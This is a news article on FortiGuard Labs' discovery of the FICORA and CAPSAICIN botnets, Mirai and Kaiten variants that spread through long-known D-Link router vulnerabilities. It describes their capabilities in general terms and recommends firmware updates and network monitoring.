FortiGuard Labs, a leading cybersecurity research team, recently uncovered a surge in botnet activity with the emergence of two new threats named “FICORA” and “CAPSAICIN” in the months of October and November 2024. These botnets, identified as variants of the notorious Mirai and Kaiten botnets, have raised concerns due to their ability to execute malicious commands and cause widespread disruption.
The distribution of these botnets primarily involves the exploitation of known vulnerabilities in D-Link routers, such as CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112. These vulnerabilities allow remote attackers to execute malicious commands through the HNAP interface, posing a significant threat to the security of affected devices. Attackers have been leveraging these weaknesses for almost a decade to deliver malware and carry out malicious activities.
The FICORA botnet, in particular, has been targeting multiple Linux architectures and utilizing sophisticated features like the ChaCha20 encryption algorithm. Its functionalities include conducting brute force attacks, killing other malware processes, and launching DDoS attacks using various protocols. On the other hand, the CAPSAICIN botnet, while focusing on East Asian countries, also exhibits similar capabilities, including downloading malicious scripts, establishing connections with command-and-control servers, and conducting DDoS attacks.
Despite the long-standing knowledge of these vulnerabilities, the prevalence of attacks exploiting them remains a significant concern for cybersecurity experts. To mitigate the risk of D-Link devices falling victim to botnet attacks, experts recommend implementing regular firmware updates and robust network monitoring practices. By keeping devices up to date and monitoring network activity closely, organizations can enhance their security posture and reduce the likelihood of exploitation by malicious actors.
Vincent Li, a researcher at FortiGuard Labs, emphasized the importance of addressing these vulnerabilities promptly to safeguard enterprise networks. He highlighted the critical need for regular device kernel updates and comprehensive monitoring to defend against evolving threats like the FICORA and CAPSAICIN botnets. The proactive approach to cybersecurity hygiene is essential in combating the increasing sophistication of botnet attacks and ensuring the resilience of network infrastructure.
In conclusion, the emergence of the FICORA and CAPSAICIN botnets underscores the ongoing challenges faced by cybersecurity professionals in protecting against evolving threats. By staying vigilant, implementing best practices such as regular updates and monitoring, and leveraging threat intelligence insights, organizations can strengthen their defenses against botnet attacks and safeguard their digital assets from potential harm.